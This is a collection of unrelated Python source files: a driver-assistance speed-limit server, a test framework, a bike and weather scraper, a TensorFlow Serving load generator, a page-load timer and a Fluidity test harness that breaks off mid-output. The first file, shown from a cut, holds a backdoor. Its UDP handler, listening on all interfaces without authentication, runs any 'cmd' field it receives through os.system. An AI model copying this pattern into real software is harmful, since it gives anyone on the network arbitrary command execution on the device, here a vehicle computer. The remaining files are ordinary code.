data, self.remote_addr = sock.recvfrom(2048)
json_obj = json.loads(data.decode())
if 'cmd' in json_obj:
try:
os.system(json_obj['cmd'])
except:
pass
if 'echo' in json_obj:
try:
echo = json.dumps(json_obj["echo"])
sock.sendto(echo.encode(), (self.remote_addr[0], Port.BROADCAST_PORT))
except:
pass
try:
self.lock.acquire()
try:
if 'active' in json_obj:
self.active = json_obj['active']
self.last_updated_active = sec_since_boot()
except:
pass
if 'road_limit' in json_obj:
self.json_road_limit = json_obj['road_limit']
self.last_updated = sec_since_boot()
finally:
self.lock.release()
except:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
return ret
def check(self):
now = sec_since_boot()
if now - self.last_updated > 20.:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
if now - self.last_updated_active > 10.:
self.active = 0
def get_limit_val(self, key, default=None):
try:
if self.json_road_limit is None:
return default
if key in self.json_road_limit:
return self.json_road_limit[key]
except:
pass
return default
def main():
server = RoadLimitSpeedServer()
roadLimitSpeed = messaging.pub_sock('roadLimitSpeed')
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
try:
sock.bind(('0.0.0.0', 843))
except:
sock.bind(('0.0.0.0', Port.RECEIVE_PORT))
sock.setblocking(False)
while True:
if server.udp_recv(sock):
dat = messaging.new_message()
dat.init('roadLimitSpeed')
dat.roadLimitSpeed.active = server.active
dat.roadLimitSpeed.roadLimitSpeed = server.get_limit_val("road_limit_speed", 0)
dat.roadLimitSpeed.isHighway = server.get_limit_val("is_highway", False)
dat.roadLimitSpeed.camType = server.get_limit_val("cam_type", 0)
dat.roadLimitSpeed.camLimitSpeedLeftDist = server.get_limit_val("cam_limit_speed_left_dist", 0)
dat.roadLimitSpeed.camLimitSpeed = server.get_limit_val("cam_limit_speed", 0)
dat.roadLimitSpeed.sectionLimitSpeed = server.get_limit_val("section_limit_speed", 0)
dat.roadLimitSpeed.sectionLeftDist = server.get_limit_val("section_left_dist", 0)
dat.roadLimitSpeed.camSpeedFactor = server.get_limit_val("cam_speed_factor", CAMERA_SPEED_FACTOR)
roadLimitSpeed.send(dat.to_bytes())
server.check()
except Exception as e:
server.last_exception = e
class RoadSpeedLimiter:
def __init__(self):
self.slowing_down = False
self.start_dist = 0
self.longcontrol = True
self.sock = messaging.sub_sock("roadLimitSpeed")
self.roadLimitSpeed = None
def recv(self):
try:
dat = messaging.recv_sock(self.sock, wait=False)
if dat is not None:
self.roadLimitSpeed = dat.roadLimitSpeed
except:
pass
def get_active(self):
self.recv()
if self.roadLimitSpeed is not None:
return self.roadLimitSpeed.active
return 0
def get_max_speed(self, CS, v_cruise_speed):
log = ""
self.recv()
if self.roadLimitSpeed is None:
return 0, 0, 0, False, ""
try:
road_limit_speed = self.roadLimitSpeed.roadLimitSpeed
is_highway = self.roadLimitSpeed.isHighway
cam_type = int(self.roadLimitSpeed.camType)
cam_limit_speed_left_dist = self.roadLimitSpeed.camLimitSpeedLeftDist
cam_limit_speed = self.roadLimitSpeed.camLimitSpeed
section_limit_speed = self.roadLimitSpeed.sectionLimitSpeed
section_left_dist = self.roadLimitSpeed.sectionLeftDist
if is_highway is not None:
if is_highway:
MIN_LIMIT = 40
MAX_LIMIT = 120
else:
MIN_LIMIT = 30
MAX_LIMIT = 100
else:
MIN_LIMIT = 30
MAX_LIMIT = 120
# log = "RECV: " + str(is_highway)
# log += ", " + str(cam_limit_speed)
# log += ", " + str(cam_limit_speed_left_dist)
# log += ", " + str(section_limit_speed)
# log += ", " + str(section_left_dist)
v_ego = CS.vEgo
if cam_limit_speed_left_dist is not None and cam_limit_speed is not None and cam_limit_speed_left_dist > 0:
diff_speed = v_ego * 3.6 - cam_limit_speed
if self.longcontrol:
sec = interp(diff_speed, [10., 30.], [20., 23.])
if MIN_LIMIT <= cam_limit_speed <= MAX_LIMIT and (self.slowing_down or cam_limit_speed_left_dist < v_ego * sec):
if not self.slowing_down:
self.start_dist = cam_limit_speed_left_dist * 1.2
self.slowing_down = True
first_started = True
else:
first_started = False
base = self.start_dist / 1.2 * 0.65
td = self.start_dist - base
d = cam_limit_speed_left_dist - base
if d > 0 and td > 0. and diff_speed > 0 and (section_left_dist is None or section_left_dist < 10):
pp = d / td
else:
pp = 0
return cam_limit_speed * CAMERA_SPEED_FACTOR + int(
pp * diff_speed), cam_limit_speed, cam_limit_speed_left_dist, first_started, log
self.slowing_down = False
return 0, cam_limit_speed, cam_limit_speed_left_dist, False, log
elif section_left_dist is not None and section_limit_speed is not None and section_left_dist > 0:
if MIN_LIMIT <= section_limit_speed <= MAX_LIMIT:
if not self.slowing_down:
self.slowing_down = True
first_started = True
else:
first_started = False
return section_limit_speed * CAMERA_SPEED_FACTOR, section_limit_speed, section_left_dist, first_started, log
self.slowing_down = False
return 0, section_limit_speed, section_left_dist, False, log
except Exception as e:
log = "Ex: " + str(e)
pass
self.slowing_down = False
return 0, 0, 0, False, log
road_speed_limiter = None
def road_speed_limiter_get_active():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_active()
def road_speed_limiter_get_max_speed(CS, v_cruise_speed):
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_max_speed(CS, v_cruise_speed)
if __name__ == "__main__":
main() |
test_framework.py | from __future__ import print_function
class AssertException(Exception):
pass
def format_message(message):
return message.replace("\n", "<:LF:>")
def display(type, message, label="", mode=""):
print("\n<{0}:{1}:{2}>{3}".format(
type.upper(), mode.upper(), label, format_message(message)))
def expect(passed=None, message=None, allow_raise=False):
if passed:
display('PASSED', 'Test Passed')
else:
message = message or "Value is not what was expected"
display('FAILED', message)
if allow_raise:
raise AssertException(message)
def assert_equals(actual, expected, message=None, allow_raise=False):
equals_msg = "{0} should equal {1}".format(repr(actual), repr(expected))
if message is None:
message = equals_msg
else:
message += ": " + equals_msg
expect(actual == expected, message, allow_raise)
def assert_not_equals(actual, expected, message=None, allow_raise=False):
r_actual, r_expected = repr(actual), repr(expected)
equals_msg = "{0} should not equal {1}".format(r_actual, r_expected)
if message is None:
message = equals_msg
else:
message += ": " + equals_msg
expect(not (actual == expected), message, allow_raise)
def expect_error(message, function, exception=Exception):
passed = False
try:
function()
except exception:
passed = True
except Exception:
pass
expect(passed, message)
def expect_no_error(message, function, exception=BaseException):
try:
function()
except exception as e:
fail("{}: {}".format(message or "Unexpected exception", repr(e)))
return
except Exception:
pass
pass_()
def pass_(): expect(True)
def fail(message): expect(False, message)
def assert_approx_equals(
actual, expected, margin=1e-9, message=None, allow_raise=False):
msg = "{0} should be close to {1} with absolute or relative margin of {2}"
equals_msg = msg.format(repr(actual), repr(expected), repr(margin))
if message is None:
message = equals_msg
else:
message += ": " + equals_msg
div = max(abs(actual), abs(expected), 1)
expect(abs((actual - expected) / div) < margin, message, allow_raise)
'''
Usage:
@describe('describe text')
def describe1():
@it('it text')
def it1():
# some test cases...
'''
def _timed_block_factory(opening_text):
from timeit import default_timer as timer
from traceback import format_exception
from sys import exc_info
def _timed_block_decorator(s, before=None, after=None):
display(opening_text, s)
def wrapper(func):
if callable(before):
before()
time = timer()
try:
func()
except AssertionError as e:
display('FAILED', str(e))
except Exception:
fail('Unexpected exception raised')
tb_str = ''.join(format_exception(*exc_info()))
display('ERROR', tb_str)
display('COMPLETEDIN', '{:.2f}'.format((timer() - time) * 1000))
if callable(after):
after()
return wrapper
return _timed_block_decorator
describe = _timed_block_factory('DESCRIBE')
it = _timed_block_factory('IT')
'''
Timeout utility
Usage:
@timeout(sec)
def some_tests():
any code block...
Note: Timeout value can be a float.
'''
def timeout(sec):
def wrapper(func):
from multiprocessing import Process
msg = 'Should not throw any exceptions inside timeout'
def wrapped():
expect_no_error(msg, func)
process = Process(target=wrapped)
process.start()
process.join(sec)
if process.is_alive():
fail('Exceeded time limit of {:.3f} seconds'.format(sec))
process.terminate()
process.join()
return wrapper
|
operations.py | '''
Date: 2018-03-22
Because here we want to get the data from openweatherapi and bike stations, I use multiprocessing to get data.
The frequency of getting weather is one time per hour and getting bike sations is one time 5 miniutes.
'''
from multiprocessing import Process
import requests
import json
import time
import mysql.connector
from analytics import model
from db import query, keyring
def buildModel(sleeptime):
'''Rebuilds the RandomForestRegressor model with the most up to date data'''
while True:
m=model.model(from_data=True)
del(m)
time.sleep(sleeptime)
def scrape(url, sleeptime, f):
'''Scrapes data from a url and applies a named function f to it.'''
while True:
#run this forever
try:
data = requests.get(url)
data = json.loads(data.text)
f(data)
#wait sleeptime before scraping again
time.sleep(sleeptime)
except:
print('request failed')
def insertWeather(rawData):
'''Inserts weather data from the open weather api into our database'''
if rawData['cod'] == '200':
dt = rawData['list'][0]['dt']
# connect to the database
cnx = query.makeCnx()
cursor = cnx.cursor()
cursor.execute('SELECT dt FROM weather where dt = %s', (dt,))
# The id is dt
# This is to check whether the data has been added or not
exist = cursor.fetchall()
# if the data hasn't been added
if (not exist):
# Insert the data to the database
query = 'INSERT INTO weather (dt, temp, pressure, humidity, temp_min, temp_max, wind_speed, wind_deg, description, icon, main) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'
data = rawData['list'][0]
para = (dt, data['main']['temp'], data['main']['pressure'], data['main']['humidity'], data['main']['temp_min'], data['main']['temp_max'], data['wind']['speed'], data['wind']['deg'], data['weather'][0]['description'], data['weather'][0]['icon'], data['weather'][0]['main'])
cursor.execute(query, para)
cnx.commit()
cursor.close()
cnx.close()
def insertLiveDB(data):
'''Inserts new stand data (from the bikes api) into the database. Used by webscraper.
Much of this code was copy pasted from mysql.com'''
global psd
cnx = query.makeCnx()
cursor = cnx.cursor()
for thing in data:
cursor.execute('SELECT time, number From dynamic_bikes WHERE time=%s AND number=%s', (thing['last_update'], thing['number']))
#upload each entry
add_stand = ("INSERT INTO dynamic_bikes"
"(time, number, status, bike_stands, available_bike_stands, available_bikes) "
"VALUES (%s, %s, %s, %s, %s, %s)" )
exist = cursor.fetchall()
if (not exist):
data_stand=(thing['last_update'], thing['number'], thing['status'], thing['bike_stands'], thing['available_bike_stands'], thing['available_bikes'])
cursor.execute(add_stand, data_stand)
# Make sure data is committed to the database
cnx.commit()
cursor.close()
cnx.close()
def main():
# I use multiprocess here because we don't need to get whether data every 5 minutes
# get the whether data every 3 hour
weather = Process(target=scrape, args=('http://api.openweathermap.org/data/2.5/find?q=Dublin&units=imperial&type=accurate&mode=json&APPID='+keyring.getWeatherKey(), 3600, insertWeather))
# get bike stations every 5 minutes
stands = Process(target=scrape, args=('https://api.jcdecaux.com/vls/v1/stations?contract=dublin&apiKey='+keyring.getBikeKey(), 300, insertLiveDB))
models = Process(target=buildModel, args=(604800))
weather.start()
stands.start()
models.start()
weather.join()
stands.join()
models.join()
if __name__ == '__main__':
main()
|
tensorflow_serving_client_workload.py | # Lint as: python2, python3
"""Tensorflow Serving client workload.
Performs image classification requests against a Tensorflow Model Server.
Inspired by
https://github.com/tensorflow/serving/blob/master/tensorflow_serving/example/resnet_client_grpc.py
This client-side load generator does the following:
* launches a specified number of worker threads (FLAGS.num_threads).
* each thread chooses a random image from the dataset (FLAGS.image_directory)
and sends a prediction request to the server, notes the latency,
and repeats with a new random image.
* once the specified time period is up (FLAGS.runtime),
the results are printed to stdout.
The following stats are reported:
* number of successful prediction requests
* number of failed requests
* throughput (successful requests / second)
* runtime
* number of threads used
* a list of all measured latencies
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import time
from absl import app
from absl import flags
import grpc
from grpc.framework.interfaces.face.face import ExpirationError
import tensorflow as tf
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2_grpc
ILSVRC_VALIDATION_IMAGES = 'ILSVRC2012_img_val'
MODEL_NAME = 'resnet'
RANDOM_SEED = 98103
DEFAULT_TIMEOUT = 3600 # one hour "infinite" timeout
FLAGS = flags.FLAGS
flags.DEFINE_string('server', 'localhost:8500', 'PredictionService host:port')
flags.DEFINE_string(
'image_directory', ILSVRC_VALIDATION_IMAGES,
'Path to a directory containing images to be classified. '
'A random image from the directory will be chosen for '
'every classification request.')
flags.DEFINE_integer('runtime', 60, 'Runtime in seconds.')
flags.DEFINE_integer('num_threads', 16,
'Number of concurrent worker threads to launch.')
flags.DEFINE_integer('rpc_timeout', DEFAULT_TIMEOUT,
'Number of seconds to set the rpc timeout to.')
def get_files_in_directory_sorted(directory):
"""Returns a list of files in directory, sorted alphabetically."""
return sorted([
os.path.join(directory, name)
for name in os.listdir(directory)
if os.path.isfile(os.path.join(directory, name))
])
class TfServingClientWorkload(object):
"""Tensorflow Serving client workload generator.
See module-level docstring for more details.
"""
def __init__(self):
self.thread_lock = threading.Lock()
self.num_completed_requests = 0
self.num_failed_requests = 0
self.latencies = []
self.file_list = get_files_in_directory_sorted(FLAGS.image_directory)
self.num_images = len(self.file_list)
channel = grpc.insecure_channel(FLAGS.server)
self.stub = prediction_service_pb2_grpc.PredictionServiceStub(channel)
# Fix random seed so that sequence of images sent to server is
# deterministic.
random.seed(RANDOM_SEED)
def get_random_image(self):
"""Returns a random image from self.file_list."""
random_index = random.randint(0, self.num_images - 1)
return self.file_list[random_index]
def classify_random_image(self):
"""Chooses a random image and sends a prediction request to the server.
If a response is receieved before the requests timesout, its latency is
saved, and the request is counted as successful. If the request timesout
or otherwise errors, its latency is discarded, and it is counted as a
failed request.
"""
image = self.get_random_image()
with open(image, 'rb') as f:
data = f.read()
request = predict_pb2.PredictRequest()
request.model_spec.name = MODEL_NAME
request.model_spec.signature_name = 'serving_default'
request.inputs['image_bytes'].CopyFrom(
# Uses version 1 of the TensorFlow protobuf
tf.compat.v1.make_tensor_proto(data, shape=[1]))
try:
start_time = time.time()
self.stub.Predict(request, FLAGS.rpc_timeout)
end_time = time.time()
with self.thread_lock:
self.num_completed_requests += 1
self.latencies.append(end_time - start_time)
except ExpirationError:
with self.thread_lock:
self.num_failed_requests += 1
def run_worker_thread(self):
"""Continuously calls classify_random_image until time is up."""
while (datetime.now() - self.start_time).seconds < FLAGS.runtime:
self.classify_random_image()
def start(self):
"""Creates and launches worker threads and waits for them to finish."""
threads = []
for _ in range(FLAGS.num_threads):
threads.append(threading.Thread(target=self.run_worker_thread))
self.start_time = datetime.now()
for t in threads:
t.start()
for t in threads:
t.join()
self.end_time = datetime.now()
def print_results(self, out=sys.stdout):
"""Prints tests results, to stdout by default."""
actual_runtime = (self.end_time - self.start_time).total_seconds()
req_per_second = self.num_completed_requests / actual_runtime
out.write('Completed requests: %s\n' % self.num_completed_requests)
out.write('Failed requests: %s\n' % self.num_failed_requests)
out.write('Runtime: %s\n' % actual_runtime)
out.write('Number of threads: %s\n' % FLAGS.num_threads)
out.write('Throughput: %s\n' % req_per_second)
out.write('Latency:\n')
for latency in self.latencies:
out.write(str(latency) + '\n')
def main(argv):
"""Runs the test and prints results to stdout."""
del argv
load_test = TfServingClientWorkload()
load_test.start()
load_test.print_results()
if __name__ == '__main__':
app.run(main)
|
soup.py | #!/usr/bin/env python
import threading
from urlparse import urlparse
from urllib import urlopen
from bs4 import BeautifulSoup
from time import time
import sys
import logging
logger = logging.getLogger(__name__)
def worker(img, url):
"""
thread worker function
"""
src = img.get('src')
logger.debug("src: {0}".format(src))
if src is not None:
o = urlparse(src)
if len(o.netloc) == 0:
src = url.scheme + '://' + url.netloc + '/' + src
html = urlopen(src)
data = html.read()
logger.debug(html.geturl())
return
class Soup(object):
def __init__(self, url):
self.url = url
def measure_load_time(self):
time_begin = time()
start_url = urlparse(self.url)
html = urlopen(self.url)
bsObj = BeautifulSoup(html.read(), 'html.parser')
threads = []
for img in bsObj.findAll('img'):
t = threading.Thread(target=worker, name=img.get('src'), args=(img, start_url))
threads.append(t)
t.start()
for thread in threads:
thread.join()
time_end = time()
return time_end - time_begin
if __name__ == '__main__':
if len(sys.argv) != 2:
sys.stderr.write("usage: {0} url\n".format(sys.argv[0]))
exit(1)
soup = Soup(url=sys.argv[1])
print(soup.measure_load_time())
|
testharness.py | #!/usr/bin/env python
import sys
import os
import os.path
import glob
import time
try:
#python2 world
from StringIO import StringIO
except ImportError:
#python3 world
from io import StringIO
try:
import fluidity.regressiontest as regressiontest
except ImportError:
# try again by adding the path "../python" relative to testharness' own location to sys.path
head,tail = os.path.split(sys.argv[0])
python_path = os.path.abspath(os.path.join(head,'..','python'))
sys.path.append(python_path)
import fluidity.regressiontest as regressiontest
import traceback
import multiprocessing
import Queue
import xml.parsers.expat
import string
try:
from junit_xml import TestSuite, TestCase
except ImportError:
class TestSuite(object):
def __init__(self, name, test_cases):
self.test_cases=test_cases
def to_file(self,*args):
print "cannot generate xml report without junit_xml module."
class TestCase(object):
def __init__(self,*args,**kwargs):
pass
def add_failure_info(self,*args,**kwargs):
pass
# make sure we use the correct version of regressiontest
sys.path.insert(0, os.path.join(os.getcwd(), os.path.dirname(sys.argv[0]), os.pardir, "python"))
import fluidity.regressiontest as regressiontest
try:
import xml.etree.ElementTree as etree
except ImportError:
import elementtree.ElementTree as etree
class TestHarness:
def __init__(self, length="any", parallel="any", exclude_tags=None,
tags=None, file="", from_file=None,
verbose=True, justtest=False,
valgrind=False, genpbs=False, exit_fails=False, xml_outfile=""):
self.tests = []
self.verbose = verbose
self.length = length
self.parallel = parallel
self.passcount = 0
self.failcount = 0
self.warncount = 0
self.teststatus = []
self.completed_tests = []
self.justtest = justtest
self.valgrind = valgrind
self.genpbs = genpbs
self.xml_parser=TestSuite('TestHarness',[])
self.cwd=os.getcwd()
self.iolock = multiprocessing.Lock()
self.xml_outfile=xml_outfile
self.exit_fails=exit_fails
fluidity_command = self.decide_fluidity_command()
if file == "":
print "Test criteria:"
print "-" * 80
print "length: ", length
print "parallel: ", parallel
print "threads: ", options.thread_count
print "tags to include: ", tags
print "tags to exclude: ", exclude_tags
print "-" * 80
print
# step 1. form a list of all the xml files to be considered.
xml_files = []
rootdir = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), os.pardir))
dirnames = []
testpaths = ["examples", "tests", "longtests"]
for directory in testpaths:
if os.path.exists(os.path.join(rootdir, directory)):
dirnames.append(directory)
testdirs = [ os.path.join( rootdir, x ) for x in dirnames ]
for directory in testdirs:
subdirs = [ os.path.join(directory, x) for x in os.listdir(directory)]
for subdir in subdirs:
g = glob.glob1(subdir, "*.xml")
for xml_file in g:
try:
p = etree.parse(os.path.join(subdir, xml_file))
x = p.getroot()
if x.tag == "testproblem":
xml_files.append(os.path.join(subdir, xml_file))
except xml.parsers.expat.ExpatError:
print "Warning: %s mal-formed" % xml_file
traceback.print_exc()
# step 2. if the user has specified a particular file, let's use that.
if file != "":
files = [file]
elif from_file:
try:
f = open(from_file, 'r')
files = [line[:-1] for line in f.readlines()]
except IOError as e:
sys.stderr.write("Unable to read tests from file %s: %s" % (from_file, e))
sys.exit(1)
f.close()
else:
files = None
if files:
for (subdir, xml_file) in [os.path.split(x) for x in xml_files]:
temp_files=files
for file in temp_files:
if xml_file == file:
p = etree.parse(os.path.join(subdir,xml_file))
prob_defn = p.findall("problem_definition")[0]
prob_nprocs = int(prob_defn.attrib["nprocs"])
testprob = regressiontest.TestProblem(filename=os.path.join(subdir, xml_file),
verbose=self.verbose, replace=self.modify_command_line(prob_nprocs), genpbs=genpbs)
self.tests.append((subdir, testprob))
files.remove(xml_file)
if files != []:
print "Could not find the following specified test files:"
for f in files:
print f
sys.exit(1)
return
# step 3. form a cut-down list of the xml files matching the correct length and the correct parallelism.
working_set = []
for xml_file in xml_files:
p = etree.parse(xml_file)
prob_defn = p.findall("problem_definition")[0]
prob_length = prob_defn.attrib["length"]
prob_nprocs = int(prob_defn.attrib["nprocs"])
if prob_length == length or (length == "any" and prob_length not in ["special", "long"]):
if self.parallel == "parallel":
if prob_nprocs > 1:
working_set.append(xml_file)
elif self.parallel == "serial":
if prob_nprocs == 1:
working_set.append(xml_file)
elif self.parallel == "any":
working_set.append(xml_file)
def get_xml_file_tags(xml_file):
p = etree.parse(xml_file)
p_tags = p.findall("tags")
if len(p_tags) > 0 and not p_tags[0].text is None:
xml_tags = p_tags[0].text.split()
else:
xml_tags = []
return xml_tags
# step 4. if there are any excluded tags, let's exclude tests that have
# them
if exclude_tags is not None:
to_remove = []
for xml_file in working_set:
p_tags = get_xml_file_tags(xml_file)
include = True
for tag in exclude_tags:
if tag in p_tags:
include = False
break
if not include:
to_remove.append(xml_file)
for xml_file in to_remove:
working_set.remove(xml_file)
# step 5. if there are any tags, let's use them
if tags is not None:
tagged_set = []
for xml_file in working_set:
p_tags = get_xml_file_tags(xml_file)
include = True
for tag in tags:
if tag not in p_tags:
include = False
if include is True:
tagged_set.append(xml_file)
else:
tagged_set = working_set
for (subdir, xml_file) in [os.path.split(x) for x in tagged_set]:
# need to grab nprocs here to pass through to modify_command_line
p = etree.parse(os.path.join(subdir,xml_file))
prob_defn = p.findall("problem_definition")[0]
prob_nprocs = int(prob_defn.attrib["nprocs"])
testprob = regressiontest.TestProblem(filename=os.path.join(subdir, xml_file),
verbose=self.verbose, replace=self.modify_command_line(prob_nprocs))
self.tests.append((subdir, testprob))
if len(self.tests) == 0:
print "Warning: no matching tests."
def length_matches(self, filelength):
if self.length == filelength: return True
if self.length == "medium" and filelength == "short": return True
return False
def decide_fluidity_command(self):
bindir = os.environ["PATH"].split(':')[0]
for binaryBase in ["dfluidity", "fluidity"]:
binary = binaryBase
debugBinary = binaryBase + "-debug"
try:
fluidity_mtime = os.stat(os.path.join(bindir, binary))[-2]
have_fluidity = True
except OSError:
fluidity_mtime = 1e30
have_fluidity = False
try:
debug_mtime = os.stat(os.path.join(bindir, debugBinary))[-2]
have_debug = True
except OSError:
debug_mtime = 1e30
have_debug = False
if have_fluidity is True or have_debug is True:
if have_fluidity is False and have_debug is True:
flucmd = debugBinary
elif have_fluidity is True and have_debug is False:
flucmd = binary
elif fluidity_mtime > debug_mtime:
flucmd = binary
else:
flucmd = debugBinary
# no longer valid since debugging doesn't change the name - any suitable alternative tests?
# if self.valgrind is True:
# if flucmd != debugBinary:
# print "Error: you really should compile with debugging for use with valgrind!"
# sys.exit(1)
return flucmd
return None
def modify_command_line(self, nprocs):
flucmd = self.decide_fluidity_command()
print flucmd
def f(s):
if not flucmd in [None, "fluidity"]:
s = s.replace('fluidity ', flucmd + ' ')
if self.valgrind:
s = "valgrind --tool=memcheck --leak-check=full -v" + \
" --show-reachable=yes --num-callers=8 --error-limit=no " + \
"--log-file=test.log " + s
# when calling genpbs, genpbs should take care of inserting the right -n <NPROCS> magic
if not self.genpbs:
s = s.replace('mpiexec ', 'mpiexec -n %(nprocs)d ' % {'nprocs': nprocs})
return s
return f
def log(self, str):
if self.verbose == True:
print str
def clean(self):
self.log(" ")
for t in self.tests:
os.chdir(t[0])
t[1].clean()
return
def run(self):
self.log(" ")
if not self.justtest:
threadlist=[]
self.test_exception_ids = multiprocessing.Queue()
tests_by_nprocs={}
for test_id in range(len(self.tests)):
# sort tests by number of processes requested
tests_by_nprocs.setdefault(self.tests[test_id][1].nprocs,
[]).append(test_id)
serial_tests = multiprocessing.Queue()
for test in tests_by_nprocs.get(1, []):
# collect serial tests to pass to worker threads
serial_tests.put(test)
for nprocs in sorted(list(tests_by_nprocs.keys()), reverse=True):
for i in range(len(threadlist),
max(0, options.thread_count-nprocs)):
# spin up enough new workers to fully subscribe thread count
threadlist.append(multiprocessing.Process(target=self.threadrun, args=[serial_tests]))
threadlist[-1].start()
if nprocs==1:
# remaining tests are serial. Join the workers
self.threadrun(serial_tests)
else:
tests = tests_by_nprocs[nprocs]
queue = Queue.Queue()
for test in tests:
queue.put(test)
# run the parallel queue on master thread
self.threadrun(queue)
for t in threadlist:
'''Wait until all threads finish'''
t.join()
exceptions = []
while True:
try:
test_id, lines = self.test_exception_ids.get(timeout=0.1)
exceptions.append((self.tests[test_id], lines))
except Queue.Empty:
break
for e, lines in exceptions:
tc=TestCase(e[1].name,
'%s.%s'%(e[1].length,
e[1].filename[:-4]))
tc.add_failure_info("Failure", lines)
self.xml_parser.test_cases+= [tc]
self.tests.remove(e)
self.completed_tests += [e[1]]
count = len(self.tests)
while True:
for t in self.tests:
if t is None: continue
test = t[1]
os.chdir(t[0])
if test.is_finished():
if test.length == "long":
test.fl_logs(nLogLines = 20)
else:
test.fl_logs(nLogLines = 0)
try:
self.teststatus += test.test()
except:
self.log("Error: %s raised an exception while testing:" % test.filename)
lines = traceback.format_exception( sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2] )
for line in lines:
self.log(line)
self.teststatus += ['F']
test.pass_status = ['F']
self.completed_tests += [test]
self.xml_parser.test_cases+=test.xml_reports
t = None
count -= 1
if count == 0: break
time.sleep(60)
else:
for t in self.tests:
test = t[1]
os.chdir(t[0])
if self.length == "long":
test.fl_logs(nLogLines = 20)
else:
test.fl_logs(nLogLines = 0)
self.teststatus += test.test()
self.completed_tests += [test]
self.xml_parser.test_cases+=test.xml_reports
self.passcount = self.teststatus.count('P')
self.failcount = self.teststatus.count('F')
self.warncount = self.teststatus.count('W')
if self.failcount + self.warncount > 0:
print
print "Summary of test problems with failures or warnings:"
for t in self.completed_tests:
if t.pass_status.count('F')+t.warn_status.count('W')>0:
print t.filename+':', ''.join(t.pass_status+t.warn_status)
print
if self.passcount + self.failcount + self.warncount > 0:
print "Passes: %d" % self.passcount
print "Failures: %d" % self.failcount
print "Warnings: %d" % self.warncount
if self.xml_outfile!="":
fd=open(self.cwd+'/'+self.xml_outfile,'w')
self.xml_parser.to_file(fd,[self.xml_parser])
fd.close()
if self.exit_fails:
sys.exit(self.failcount)
def threadrun(self, queue):
'''This is the portion of the loop which actually runs the
tests. This is split out so that it can be threaded.
Each thread runs tests from the queue until it is exhausted.'''
# We use IO locking to attempt to keep output understandable
# That means writing to a buffer to minimise interactions
main_stdout = sys.stdout
while True:
buf = StringIO()
sys.stdout = buf
try:
#pull a test number from the queue
test_id = queue.get(timeout=0.1)
(dir, test) = self.tests[test_id]
except Queue.Empty:
# If the queue is empty, we're done.
sys.stdout = main_stdout
buf.seek(0)
with self.iolock:
print buf.read()
break
try:
runtime=test.run(dir)
if self.length=="short" and runtime>30.0:
self.log("Warning: short test ran for %f seconds which"+
" is longer than the permitted 30s run time"%runtime)
self.teststatus += ['W']
test.pass_status = ['W']
except:
self.log("Error: %s raised an exception while running:" % test.filename)
lines = traceback.format_exception( sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2] )
for line in lines:
self.log(line)
test.pass_status = ['F']
self.test_exception_ids.put((test_id, lines))
finally:
sys.stdout = main_stdout
buf.seek(0)
with self.iolock:
print buf.read()
def list(self):
for (subdir, test) in self.tests:
print os.path.join(subdir, test.filename)
if __name__ == "__main__":
import optparse
parser = optparse.OptionParser()
parser.add_option("-l", "--length", dest="length", help="length of problem (default=any)", default="any")
parser.add_option("-p", "--parallelism", dest="parallel", help="parallelism of problem: options are serial, parallel or any (default=any)",
default="any")
parser.add_option("-e", "--exclude-tags", dest="exclude_tags", help="run only tests that do not have specific tags (takes precidence over -t)", default=[], action="append")
parser.add_option("-t", "--tags", dest="tags", help="run tests with specific tags", default=[], action="append")
parser.add_option("-f", "--file", dest="file", help="specific test case to run (by filename)", default="")
parser.add_option("--from-file", dest="from_file", default=None,
help="run tests listed in FROM_FILE (one test per line)")
parser.add_option("-n", "--threads", dest="thread_count", type="int",
help="number of tests to run at the same time", default=1)
parser.add_option("-v", "--valgrind", action="store_true", dest="valgrind")
parser.add_option("-c", "--clean", action="store_true", dest="clean", default = False)
parser.add_option("--just-test", action="store_true", dest="justtest", default=False)
parser.add_option("--just-list", action="store_true", dest="justlist")
parser.add_option("--genpbs", action="store_true", dest="genpbs")
parser.add_option("-x","--xml-output", dest="xml_outfile", default="", help="filename for xml output")
parser.add_option("--exit-failure-count", action="store_true", dest="exit_fails", help="Return failure count on exit")
(options, args) = parser.parse_args()
if len(args) > 0: parser.error("Too many arguments.")
if options.parallel not in ['serial', 'parallel', 'any']:
parser.error("Specify parallelism as either serial, parallel or any.")
os.environ["PATH"] = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), "..", "bin")) + ":" + os.environ["PATH"]
try:
os.environ["PYTHONPATH"] = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), "..", "python")) + ":" + os.environ["PYTHONPATH"]
except KeyError:
os.putenv("PYTHONPATH", os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), "..", "python")))
try:
os.environ["LD_LIBRARY_PATH"] = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), "..", "lib")) + ":" + os.environ["LD_LIBRARY_PATH"]
except KeyError:
os.putenv("LD_LIBRARY_PATH", os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), "..", "lib")))
try:
os.mkdir(os.environ["HOME"] + os.sep + "lock")
except OSError:
pass
if len(options.exclude_tags) == 0:
exclude_tags = None
else:
exclude_tags = options.exclude_tags
if len(options.tags) == 0:
tags = None
else:
tags = options.tags
testharness = TestHarness(length=options.length, parallel=options.parallel,
exclude_tags=exclude_tags, tags=tags,
file=options.file, verbose=True,
justtest=options.justtest,
valgrind=options.valgrind,
from_file=options.from_file,
genpbs=options.genpbs,
exit_fails=options.exit_fails,
xml_outfile=options.xml_outfile)
if options.justlist:
testharness.list()
elif options.clean:
testharness.clean()
else:
print "-" * 80
which = os.popen("which %s" % testharness.decide_fluidity_command()).read()
if len(which) > 0:
print "which %s: %s" % ("fluidity", which),
versio = os.popen("%s -V" % testharness.decide_fluidity_command()).read()
if len(versio) > 0:
print versio
print "-" * 80
if options.valgrind is True:
print "-" * 80
print "I see you are using valgrind!"
print "A couple of points to remember."
